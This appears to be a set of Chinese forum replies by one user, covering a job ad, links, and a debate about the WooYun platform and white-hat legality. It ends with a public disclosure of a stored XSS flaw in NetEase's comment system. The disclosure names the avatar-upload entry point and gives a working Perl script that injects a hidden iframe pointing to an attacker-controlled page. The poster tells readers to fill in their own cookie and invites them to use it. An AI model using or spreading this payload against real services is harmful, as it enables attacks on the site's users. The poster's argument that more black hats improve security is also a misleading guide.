@ClutchBear 简历私信我

去 boss 联系我们的人力就可以。

@2ME 暂时没有算法面试，岗位要求不会太高。

不限制学历。

哦， http://test1.openerserver.com:1008/helloworld 下午好像死了一段时间。

+1

这两天相关报道也很多，再贴一个补充的： http://finance.ifeng.com/gold/special/uselection7/
可以更加了解事情的来龙去脉。

<img src="http://ww4.sinaimg.cn/mw1024/cd02f47ejw1f5scn0zwikj21kw14qn96.jpg" hidefocus="true" width="991" height="710" style="display: block; opacity: 1; position: absolute; top: 50%; left: 50%; margin-left: -495.5px; margin-top: -355px; zoom: 1;">
近 2 年用的全是便宜货，不能比啊。

有人问我，现在需要一个法外之地吗？

@aeshfawre 个人认为这才是现在正确的结局！
黑帽子越多，安全问题越严重，才能倒逼厂商越重视。
当厂商付出更多的钱到安全方面的时候，安全公司才能越来越多，才能有越来越多的人洗白！
整个利益链条就会导致事情向好的方面转向。

而后，才能有白帽子的生存空间！

@lianghudou 说的好！

@Vamwere 确实，乌云的主体并不明确。 从乌云的网站上看不到这个网站承办人的任何信息。 起码乌云不是一个公司的行为。

可能因为行业的敏感性，乌云也隐去了这些信息。为了保障自己的安全，或者其他的原因!


@ByZHkc3 比较正确的做法

其实对于漏洞的挖掘，只要你开始做，就无法分清哪些是违法，哪些不违法。
有很多时候，需要下载数据库里的内容，去继续分析下面的漏洞。

所以，我个人认为这里下载数据并不是主要需要关注的地方。
这里是由于厂商要采取法律行为，就把下载数据这个事情来当做主要处罚的证据。

@ixinshang 恩，比特币却有好处。
@mornlight @7654 对于因为下载数据而有事，个人认为这个是厂商要依据的法律。其实从一开始做就已经触犯法律了，现在只是需要找法律条文来处罚，所以把这个下载数据拿来说事而已！ 关键的问题在于，一开始这个白帽子就疏忽了，就没有做个人防护。他天真的认为只要自己不去做坏事，就肯定没事，况且自己还把漏洞上报给了乌云，自己是一个善意的举动。


@wdlth 同意

@maxsec 这个似乎做不到吧！ 没法把代码插入到他已经发表的评论里啊。

请不要再发邮件询问这个漏洞的具体使用！
我一概不会回答。

还有告诫那些破坏者，不要太过肆无忌惮的使用这些东西。一个好好的页面你插入上百条地址让人去访问，太过分些了。

特别还是 NBA 的新闻，别坏了中子这两天看 NBA 的兴致～！

还有人等着看吗？？刚才出去吃了个肉串喝了点酒。看来网易反应比较慢，都放出来，让他们好好自查吧！

漏洞入口，就在上传头像的地方。： http://tie.163.com/setting/avatar/

原理：搞球啊！上传了头像文件之后，服务器返回了一个头像文件的地址，然后这个地址竟然要客户的浏览器再去提交到内部的 API 。 要我是你们项目经理，就骂死你们！内部的 Http API 不是这么用的！


代码：
use strict;
our $VERSION=0.1;

use Data::Dumper;
use AnyEvent;

use JSON::XS;

use AnyEvent::HTTP;


my $cvar = AnyEvent->condvar;
my $url='http://comment.api.163.com/api/v1/products/a2869674571f77b5a0867c3d71db5856/users?&ibc=newspc';

my $ss=qq|http://img5.cache.netease.com/tie/images/noface80_80.png "><iframe src="http://xx.xxxx.com/xxx.php" style="display:none"></iframe>.|;
warn encode_json({avatar=>$ss});

http_request
PUT => $url,
headers => { "user-agent" => "OPener 1.0",'Content-Type'=>'application/json', "Cookie"=>''},
body=> encode_json({avatar=>$ss}),
timeout => 30,
sub {
my ($body, $hdr) = @_;
warn $body;
return 1;
};

$cvar->recv;

$url 自己修改一下，还有 Cookie 自己改一下，就可以上传了。

网易抓紧吧！

懒得做了，有看到这个的去那里发了吧。
我没意见。:0-)

我过一会把漏洞入口也发上来。